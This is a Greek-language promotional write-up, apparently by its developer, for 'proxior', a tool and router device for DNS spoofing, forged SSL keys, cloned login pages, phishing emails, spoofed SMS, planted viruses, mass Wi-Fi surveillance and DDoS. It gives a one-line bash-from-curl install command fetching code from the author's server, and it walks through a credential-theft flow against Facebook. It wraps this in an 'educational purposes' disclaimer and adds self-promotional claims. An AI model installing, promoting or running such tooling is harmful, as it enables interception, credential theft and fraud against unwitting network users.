Γράφει ο Γεράσιμος Μπαρχαμπάς
Το proxior είναι ένα πρόγραμμα πλαστογράφησης και δηλητηρίασης dns, κλωνοποίησης ηλεκτρονικών υπηρεσιών καθώς και εισαγωγής ψεύτικων κλειδιών κρυπτογράφησης ssl.
Αναπτύχθηκε από τον Γεράσιμο Μπαρχαμπά.
Ο Γεράσιμος Μπαρχαμπάς είναι 27 ετών, μένει στο Μεσολόγγι, έχει καταγωγή από το Αιτωλικό Αιτωλοακαρνανίας και έχει φτιάξει πληθώρα προγραμμάτων από τα οποία έχει λάβει παγκόσμιες διακρίσεις.
Γνωρίζει 13 γλώσσες προγραμματισμού (c, c++, c#, pascal, fotran, basic, php, perl, python, shell script, batchfiles, javascript, java) καθώς και διάφορες άλλες γλώσσες ανάπτυξης ιστοσελίδων και βάσεων δεδομένων όπως (html, css, xml, jquery, angular js, sql, t-sql, anci sql, noslq).
Ο Γεράσιμος σπoύδασε πληροφορική και έχει συνεργαστεί με κορυφαίους επιστήμονες της πληροφορικής όπως ο Richard Stallman και εκτός από τον προγραμματισμό έχει ασχοληθεί ενεργά και επαγγελματικά με την ψηφιακή ιατροδικαστική – εγκληματολογία (digital forensics) ηλεκτρονικών συσκευών.
https://github.com/proxior
http://proxior.c1.biz/
http://proxior.c1.biz/cloud
Το πρόγραμμα αυτό έχει φτιαχτεί για εκπαιδευτικούς σκοπούς και μόνο και προστατευέτε νομικά από την άδεια GNU Affero General Public License v3.0 του οργανισμού ελεύθερου λογισμικού.
Απαγορεύεται ρητά από την άδεια η οποιαδήποτε χρήση του προγράμματος για κακόβουλη χρήση.
Το πρόγραμμα χωρίζεται σε τρεις κατηγορίες.
Το λογισμικό, το υλικό και τις απομακρυσμένες εντολές.
Το λογισμικό αποτελεί το πρόγραμμα όπου είναι όλες οι λειτουργίες του προγράμματος καθώς ο σέρβερ (lan-wifi-interception).
Η συσκευή αποτελείτε από ένα ρούτερ και μια κεραία και μπορεί να χρησιμοποηθει μέσω ενός υπολογιστή η μέσω ενός κινητού και ένα powebank.
Οι απομακρυσμένες εντολές είναι του προγράμματος σε μορφή cloud.
Μόνο με την εξής εντολή στο τερματικό του κινητό η του υπολογιστή bash <(curl -s http://proxior.c1.biz/install) τότε αυτόματα η συσκευή μετατρέπεται σε έναν μίνι σέρβερ που συνδέεται με το ρούτερ το ρούτερ συνδέεται σε ανοιχτό wifi και έπειτα μετατρέπει το σήμα σε δημόσιο wifi σε απόσταση δύο χιλιομέτρων.
Έπειτα ο χρήστης απομακρυσμένα μέσω του cloud του προγρμματος που έχω δημιουργήσει και μέσω σταθερών ip που έχουν είδη δηλωθεί και περαστεί μέσα στο ρούτερ μπορεί να πλαστογραφεί οποιαδήποτε ηλεκτρονική υπηρεσία θέλει να υπογράφει ψεύτικα κλειδιά πιστοποίησης και να υποκλέπτει όλη την κίνηση του δικτύου.
Μπορεί ο χρήστης τοποθετώντας 5-6 συσκευές να δημιουργήσει wifi ελεύθερο wifi σε μεγάλη ακτίνα και να παρακολουθεί όλους τους χρήστες που εισέρχονται στο δίκτυο.
Μπορεί να παρακολουθεί χιλιάδες χρήστες σε μεγάλη ακτίνα και μάλιστα απομακρυσμένα.
Μπορεί να παρακολουθεί πολλές τοποθεσίες απομακρυσμένα μέσω του cloud.
ΟΙ λειτουργίες του προγράμματος είναι οι εξής:
Καταγραφή της ακτίνας δράσης των συσκευών παρακολούθησης.
Καταγραφή των θέσεων που έχουν στηθεί οι συσκευές παρακολούθησης.
Οι συσκευές συνδέονται με σταθερές ip από χώρες του εξωτερικού.
Στην συνέχεια μέσω του cloud που βρίσκεται σε σερβερς ανωνυμίας ο χρήστης ελέγχει της συσκευές από μακριά παγιδεύοντας οποιαδήποτε τοπικά δίκτυα θέλει.
Μπορεί να ανακατευθείνει την κίνηση σε ένα δίκτυο.
Σε περίπτωση που ο χρήστης θελήσει να σβήσει τα ηλεκτρονικά του αποτυπώματα τότε μπορεί απομακρυσμένα μέσω του cloud να κάνει upgrade firmware την συσκευή και format το κινητό η τον υπολογιστή του (ανάλογα που το έχει εγκαταστήσει).
Το πρόγραμμα μπορεί να μιμείτε ηλεκτρονικά ταχυδρομεία οποιασδήποτε ηλεκτρονικής υπηρεσίας και μέσω εμαιλ να ανακατευθείνει την κίνηση σε κλωνοποιημένες υπηρεσίες.
Το πρόγραμμα μπορεί να δημιουργεί ιούς η οποίοι μπορούν να φυτεύονται απομακρυσμένα σε υπολογιστές με σκοπό την μόνιμη παράλυση και παρακολούθηση του.
Η συσκευή μπορεί να μιμείτε εταιρείες κινητής τηλεφωνίας και ηλεκτρονικές ηπυπηρεσίες στέλνοντας sms με τα ακριβής ονόματα τους.
Αν ένας χήστης έχει πολλές συνδεδεμένες συσκευές στο cloud τότε μπορεί χρησιμοποιώντας όλες μαζί της συσκευές να ρουφάει όλη την κίνηση της γραμμής που είναι συνδεδεμένη η κάθε συσκευή πολλαπλασιάζοντας τρομακτικά την δύναμη τους έτσι ώστε να δημιουργεί επιθέσεις dos και ddos.
i) Proxior Λογισμικό
Το πρόγραμμα παρέχει τρεις μεθόδους ανακατεύθυνσης.
1) Ανακατεύθυνση μέσω δημιουργίας ιού batch file για λειτουργικά συστήματα windows(windows xp,7,8,8.1,10).
Αυτή η μέθοδος έχει ως σκοπό την αντικατάσταση της συγκεκριμένης υπηρεσίας dns που έχει επιλεχθεί από το πρόγραμμα σε μόνιμη κατάσταση τροποποιώντας τους καταχωρητές dns στην ρίζα του λειτουργικού συστήματος των windows και συγκεκριμένα στον φάκελο system32.
2) Ανκατεύθηνση μέσω αποστολής μυνήματος ηλεκτρονικού ταχυδρομείου (email phishing).
Το πρόγραμμα διαθέτει έτοιμο υποπρόγραμμα αποστολής εμαιλ το οποίο μιμείται άριστα την εκάστοτε ηλεκτρονική υπηρεσία αλλάζοντας έτσι το όνομα του αποστολέα με αυτό της ηλεκτρονικής υπηρεσίας εμφανίζοντας το μήνυμα της υποχρεωτικής ασφάλισης του λογαρισμού οδηγώντας την κλωνοποιημένη ηλεκτρονική υπηρεσία και στο πλαστογραφημένο dns.
3) Το πρόγραμμα όπως είπαμε κλωνοποιεί ηλεκτρονικές υπηρεσίες και παρέχει και μια σειρά από έτοιμες κλωνοποιημένες υπηρεσίες.
Η συσκευή είναι ένα ρούτερ το οποίο έχει αναβαθμιστεί και έχει υποστεί κάποιες ρυθμίσεις και μπορεί να πλαστογραφεί και να δηλητηριάζει τομείς dns δημιουργώντας έναν dns server μέσα στο τοπικό δίκτυο.
Έτσι όταν ο χρήστης ζητήσει να επισκευθεί μια ηλεκτρονική υπηρεσία όπως για παράδειγμα το facebook τότε η συσκευή θα αναγνωρίσει ότι υπάρχει μια ίδια υπηρεσία με το ίδιο ακριβώς όνομα και θα επιστρέψει πίσω στον χρήστη την ψευτική υπηρεσία διότι είναι πιο κοντά από την πραγματική.
Ο dns server που βρίσκεται μέσα στο τοπικό δίκτυο προηγείτε του διαδικτύου και έτσι ιεραρχικά απαντάει πρώτο στα αιτήματα.
Παράδειγμα λειτουργίας: Αίτημα χρήστη -> www.facebook.gr -> εύρεση ψεύτικου dns -> ψεύτικος διακομιστής www.facebook.gr -> απάντηση στον χρήστη για προσπέλαση της υπηρεσίας -> εισαγωγή στοιχείων σύνδεσης του χρήστη και απώλεια πληροφοριών.
Η ονομασία είναι ίδια www.facebook.gr αλλά τα ηλεκτρονικά αποτυπώματα είναι διαφορετικά, όμως δεν μπορεί να το καταλάβει αυτό ο εκάστοτε χρήστης.
Proxior Συσκευή
Η ψευδαίσθηση DNS , που επίσης αναφέρεται ως δηλητηρίαση της προσωρινής μνήμης DNS, είναι μια μορφή hacking της ασφάλειας υπολογιστών, στην οποία εισάγονται διεφθαρμένα δεδομένα του Domain Name System στην προσωρινή μνήμη του ανιχνευτή DNS, προκαλώντας την επιστροφή ενός εσφαλμένου αρχείου καταγραφής αποτελεσμάτων, π.χ. μια διεύθυνση IP. Αυτό οδηγεί στην εκτροπή της επισκεψιμότητας στον υπολογιστή του εισβολέα (ή σε οποιονδήποτε άλλο υπολογιστή).
Ένας εξυπηρετητής συστήματος ονομάτων τομέα μεταφράζει ένα αναγνωρίσιμο όνομα τομέα (όπως example.com ) σε μια αριθμητική διεύθυνση IP που χρησιμοποιείται για τη δρομολόγηση επικοινωνιών μεταξύ κόμβων .
Κανονικά, εάν ο διακομιστής δεν γνωρίζει την ζητούμενη μετάφραση, θα ζητήσει από έναν άλλο διακομιστή και η διαδικασία θα συνεχίσει να επαναλαμβάνεται . Για να αυξήσετε την απόδοση, ένας διακομιστής θα θυμάται (προσωρινά) αυτές τις μεταφράσεις για ένα συγκεκριμένο χρονικό διάστημα.
Αυτό σημαίνει ότι αν λάβει άλλη αίτηση για την ίδια μετάφραση, μπορεί να απαντήσει χωρίς να χρειάζεται να ζητήσει άλλους διακομιστές, μέχρι να λήξει αυτή η προσωρινή μνήμη.
Όταν ένας διακομιστής DNS έχει λάβει μια ψευδή μετάφραση και το αποθηκεύει για βελτιστοποίηση απόδοσης, θεωρείται δηλητηριασμένο και παρέχει τα ψευδή δεδομένα στους πελάτες.
Εάν ένας διακομιστής DNS έχει δηλητηριαστεί, μπορεί να επιστρέψει μια λανθασμένη διεύθυνση IP, εκτρέποντας την επισκεψιμότητα σε έναν άλλο υπολογιστή (συχνά έναν εισβολέα).
Η συσκευή μάλιστα σε συνδυασμό με το πρόγραμμα προχωρά ένα βήμα πιο πέρα από τον κλασικό τρόπο πλαστογράφησης και δημητηρίασης dns παρακάμπτωντας ακόμη και τις ασφάλειες DNSSEC (επεκτάση ασφαλείας του συστήματος ονομάτων τομέα) και HSTS (επικοινωνία μόνο μέσω HTTPS με το διακομιστή).
Proxior cloud
Είσοδος και πρόσβαση σε λειτουργίες με 4 επίπεδα.
Το πρόγραμμα κατά την εγγραφή των χρηστών αναγνωρίζει τον τύπο του email και κατατάσσει τους χρήστες σε τρία επίπεδα πρόσβασης.
Οι εγγραφές που γίνονται από email προσωπικά, εμπορικά, εταιρικά κλπ όπως gmail,hotmail,yahoo,gr,com κλπ αποκτούν πρόσβαση στο επίπεδο 1.
Οι εγγραφές που γίνονται από email εκπαιδευτικών ιδρυμάτων όπως σχολές, πανεπιστήμια, κολέγια κλπ δλδ εμαιλ edu αποκτούν πρόσβαση στο επίπεδο 2.
Οι εγγραφές που γίνονται από email κυβερνητικά, σωμμάτων ασφαλείας, επιβολής του νόμου, κλπ δλδ εμαιλ gov αποκτούν πρόσβαση στο επίπεδο 3.
Οι εγγραφές που γίνονται από email των ενόπλων δυνάμεων δλδ εμαιλ army αποκτούν πρόσβαση στο επίπεδο 4.
Σε καθένα από αυτά τα επίπεδα παρέχονται στον χρήστη διάφορες λειτουργίες.
Αν ένας χρήστης ενός επιπέδου προσπαθήσει να εισέλθει σε επίπεδο ανωτέρω από αυτό που έχει πρόσβαση εκτός του ότι δεν μπορεί φυσικά αυτομάτως ο λογαριασμός του αναστέλεται και καταγράφονται όλα του τα ηλεκτρονικά αποτυπώματα όπως (λειτουργικό σύστημα συσκευής, φυλλομετρήτρης της συσκευής, διεύθνση ip, ο σειριακός αριθμός του αποθηκευτικού μέσου της συσκευής και διάφορα αλλά) έτσι ώστε να υπάρχει η πλήρης ταυτοποίηση του χρήστη.
Δεν μπορεί να ξανά κάνει εγγραφή στο μέλλον από αυτήν την συσκευή.
Σε περίπτωση που κάποιος λογαριασμός χακαριστεί και ζητήσει ο νόμιμος χρήστης επαναφορά μέσω εμαιλ τότε ο χρήστης που είχε εισέλθει παρανόμως, ταυτοποιείτε.
Για περισσότερη ασφάλεια το πρόγραμμά ελέγχει το ποντίκι του χρηστή και το πληκτρολόγιο του και αλληλεπιδρά μαζί του έτσι ώστε αν για 15 λεπτά συνεχόμενα δεν γίνεται καμία ενέργεια τότε αυτόματα αποσυνδέεται η συσκευή από το πρόγραμμά.
Αν ο χρήστης αισθάνεται ότι δεν είναι σε ασφαλές μέρος τότε κάνει αίτημα και του αποστέλλεται κωδικός μια χρήσεως.
Οπότε ακόμη και στην περίπτωση υποκλοπής του κωδικού να είναι άχρηστος διότι λειτουργεί μόνο για μία είσοδο.
Μόλις γίνει αποσύνδεση από οπουδήποτε τότε ο κωδικός καταστρέφεται και ισχύει ξανά ο κανονικός.
Η εγκατάσταση του προγράμματος γίνεται στις συσκευές απομακρυσμένα απλά με μια εντολή και τίποτε άλλο.
Καμία σχέση με τον κλασικό τρόπο εγκατάστασης προγραμμάτων.
Στα κινητά τηλέφωνα η εγκατάσταση μπορεί να γίνει απλά κάνοντας μια κλήση ενός ussd code.
Το πρόγραμμα κόβει όλες της εισόδους από της εφαρμογές του υπολογιστή η του κινητού τηλεφώνου η του ταμπλετ αντίστοιχα έτσι ώστε να οδηγηθεί ο χρήστης σε είσοδο υποχρεωτικά μέσω του φυλλομετρητή.
Διαθέτει πολυγλωσσικό μενού 8 γλωσσών (αγγλικά, ελληνικά, γαλλικά,γερμανικά,ιταλικά,ισπανικά,πορτογαλικά,ρώσικα)
https://github.com/proxior?fbclid=IwAR1AVgkbRCCfj1LvfZ7Pr-mXyTFhspBsBmi80RgFLnIXmFTJkpz_je8JfIM
Το πρόγραμμα έχει φτιαχτεί για εκπαιδευτικούς σκοπούς και προστατεύετε από την άδεια GNU Affero General Public License v3.0 του παγκόσμιου οργανισμού ελεύθερου λογισμικού.
Απαγορεύεται από τον νόμο και την άδεια ρητά η χρήση τους για οποιαδήποτε κακόβουλη χρήση.
ΜΕ ΒΑΣΗ ΤΟ ΝΟΜΙΚΟ ΠΛΑΙΣΙΟ ΤΙΜΩΡΕΙΤΕ Ο ΕΠΙΤΗΘΕΜΕΝΟΣ ΚΑΙ ΟΧΙ Ο ΔΗΜΙΟΥΡΓΟΣ ΤΟΥ ΠΡΟΓΡΑΜΜΑΤΟΣ.
Ο ΔΗΜΙΟΥΡΓΟΣ ΠΡΟΣΤΑΤΕΥΕΤΕ ΑΠΟ ΤΗΝ ΑΔΕΙΑ ΓΙΑ ΤΗΝ ΑΝΑΔΕΙΞΗ ΤΟΥ ΚΕΝΟΥ ΑΣΦΑΛΕΙΑΣ ΤΟΥ ΣΥΣΤΗΜΑΤΟΣ ΚΑΙ ΓΙ ΑΥΤΟ ΔΗΜΟΣΙΕΥΕΙ ΤΟΝ ΚΩΔΙΚΑ ΤΟΥ ΠΡΟΓΡΑΜΜΑΤΟΣ ΚΑΙ ΤΑ ΠΛΗΡΗ ΣΤΟΙΧΕΙΑ ΤΑΥΤΟΙΠΟΙΗΣΗΣ ΤΟΥ.